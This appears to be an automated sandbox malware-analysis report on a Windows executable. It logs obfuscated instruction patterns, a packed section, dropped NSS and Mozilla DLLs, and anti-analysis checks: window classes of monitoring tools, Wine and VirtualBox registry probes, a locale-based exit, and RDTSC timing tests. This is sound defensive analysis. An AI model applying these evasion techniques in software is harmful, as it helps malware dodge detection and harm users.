Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A898B8 push 752F2E14h; mov dword ptr [esp], ebx	0_2_00A8995F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A8D8B9 push ecx; mov dword ptr [esp], edi	0_2_00A8D8DA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A1C094 push 2A70EB4Ah; mov dword ptr [esp], eax	0_2_00A1C142
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A650E4 push esi; mov dword ptr [esp], edi	0_2_00A6510B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A650E4 push 17D52A00h; mov dword ptr [esp], ebx	0_2_00A6519D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009FA0D9 push ebp; mov dword ptr [esp], 147702F2h	0_2_009FA176
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5B8E8 push ebp; mov dword ptr [esp], 48AD2B5Dh	0_2_00A5B910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5B8E8 push esi; mov dword ptr [esp], 6FEF0F4Ah	0_2_00A5B946
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push 0885AC35h; mov dword ptr [esp], ebp	0_2_009B48DA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push 71C4C1D1h; mov dword ptr [esp], ecx	0_2_009B494C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push ebx; mov dword ptr [esp], 4FDB2F2Ah	0_2_009B49F6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push 7765AF13h; mov dword ptr [esp], ebx	0_2_009B4B16
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push edx; mov dword ptr [esp], eax	0_2_009B4B30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push 5F527E21h; mov dword ptr [esp], edx	0_2_009B4B47
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push esi; mov dword ptr [esp], 6FF5C0C9h	0_2_009B4BCE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push eax; mov dword ptr [esp], edx	0_2_009B4BD6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push 19522B9Dh; mov dword ptr [esp], ecx	0_2_009B4C65
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push 3BF5C945h; mov dword ptr [esp], ebx	0_2_009B4CA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push 40B4C11Fh; mov dword ptr [esp], ebp	0_2_009B4CF4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push eax; mov dword ptr [esp], ecx	0_2_009B4DCE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push 6B4A07E8h; mov dword ptr [esp], edx	0_2_009B4F5F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push ebp; mov dword ptr [esp], ecx	0_2_009B5127
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push edi; mov dword ptr [esp], 3FBEA4C6h	0_2_009B5150
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push 0726099Dh; mov dword ptr [esp], ecx	0_2_009B5163
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push edx; mov dword ptr [esp], eax	0_2_009B518E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push 088EB0B5h; mov dword ptr [esp], edi	0_2_009B523F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push esi; mov dword ptr [esp], edx	0_2_009B5300
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push edx; mov dword ptr [esp], ebx	0_2_009B531D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push eax; mov dword ptr [esp], ebp	0_2_009B535D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push ebx; mov dword ptr [esp], edx	0_2_009B5393
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF push ebp; mov dword ptr [esp], esi	0_2_009B53ED

Source: file.exe

Static PE information: section name: whlvtsns entropy: 7.952917726453824

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_005F9860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C069B second address: 9C06A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C0B51 second address: 9C0B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C0B55 second address: 9C0B59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C0B59 second address: 9C0B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE9A87AE1F3h 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C0B77 second address: 9C0BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FE9A9298656h 0x0000000a popad 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE9A9298666h 0x00000014 jc 00007FE9A9298656h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C0BA2 second address: 9C0BA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C0BA6 second address: 9C0BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C0BAC second address: 9C0BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C0E90 second address: 9C0E9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C0E9E second address: 9C0EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C294A second address: 9C294E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C294E second address: 9C2983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pop ecx 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FE9A87AE1F1h 0x0000001a jmp 00007FE9A87AE1EEh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2983 second address: 9C29B9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007FE9A9298656h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jnp 00007FE9A929865Eh 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 pushad 0x00000019 jmp 00007FE9A9298661h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C29B9 second address: 9C29BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2AF3 second address: 9C2B1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FE9A9298656h 0x00000009 ja 00007FE9A9298656h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 push 00000000h 0x00000017 mov edx, dword ptr [ebp+122D3A62h] 0x0000001d call 00007FE9A9298659h 0x00000022 push eax 0x00000023 push edx 0x00000024 push ecx 0x00000025 pushad 0x00000026 popad 0x00000027 pop ecx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2B1F second address: 9C2B24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2B24 second address: 9C2B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A9298667h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2B4B second address: 9C2B51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2B51 second address: 9C2B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2B55 second address: 9C2B77 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE9A87AE1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jng 00007FE9A87AE1ECh 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2B77 second address: 9C2B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jl 00007FE9A9298658h 0x0000000d popad 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2D33 second address: 9C2D50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9A87AE1F9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2DF2 second address: 9C2DF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2DF6 second address: 9C2DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D54C3 second address: 9D54DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE9A9298664h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E3D2C second address: 9E3D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B43B1 second address: 9B43C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A929865Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B43C0 second address: 9B43DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE9A87AE1F5h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E4246 second address: 9E424A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E424A second address: 9E4250 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D959F second address: 9D95C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A9298662h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jng 00007FE9A9298656h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D95C0 second address: 9D95C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D95C4 second address: 9D960F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FE9A9298679h 0x00000011 jmp 00007FE9A929865Eh 0x00000016 jmp 00007FE9A9298665h 0x0000001b pushad 0x0000001c jmp 00007FE9A929865Bh 0x00000021 jbe 00007FE9A9298656h 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E4BFC second address: 9E4C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E4D5B second address: 9E4D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E4D5F second address: 9E4DA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE9A87AE1EFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007FE9A87AE1F0h 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FE9A87AE1EAh 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 popad 0x00000022 ja 00007FE9A87AE21Ah 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b pop eax 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E4DA5 second address: 9E4DCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A9298661h 0x00000007 jmp 00007FE9A929865Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E4DCB second address: 9E4DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E50C5 second address: 9E50CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E50CB second address: 9E50D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E50D1 second address: 9E50D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E50D7 second address: 9E50E4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE9A87AE1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E6854 second address: 9E6871 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FE9A9298656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FE9A9298661h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AF549 second address: 9AF58B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE9A87AE1EFh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007FE9A87AE1F0h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FE9A87AE1F5h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EA214 second address: 9EA223 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EA223 second address: 9EA22D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE9A87AE1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EA443 second address: 9EA450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FE9A9298656h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E9360 second address: 9E9364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EEB9D second address: 9EEBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EEBA1 second address: 9EEBA7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F38FA second address: 9F3900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F3900 second address: 9F391B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FE9A87AE1E6h 0x0000000a popad 0x0000000b jmp 00007FE9A87AE1F0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F391B second address: 9F3922 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F2D5C second address: 9F2D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F31B4 second address: 9F31B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F3468 second address: 9F346C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F35CA second address: 9F35D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FE9A9298656h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F35D4 second address: 9F35E7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE9A87AE1E6h 0x00000008 jno 00007FE9A87AE1E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F35E7 second address: 9F35F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE9A9298656h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F379B second address: 9F37B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE9A87AE1F0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F37B0 second address: 9F37B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F37B6 second address: 9F37F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007FE9A87AE205h 0x0000000d jmp 00007FE9A87AE1F9h 0x00000012 jnl 00007FE9A87AE1E6h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push ebx 0x0000001b jmp 00007FE9A87AE1ECh 0x00000020 jbe 00007FE9A87AE1ECh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F407B second address: 9F407F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F407F second address: 9F408D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FE9A87AE1E6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F408D second address: 9F4091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F43A0 second address: 9F43A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F4549 second address: 9F4553 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE9A9298656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F522E second address: 9F5232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F603B second address: 9F604C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE9A9298656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F604C second address: 9F6051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
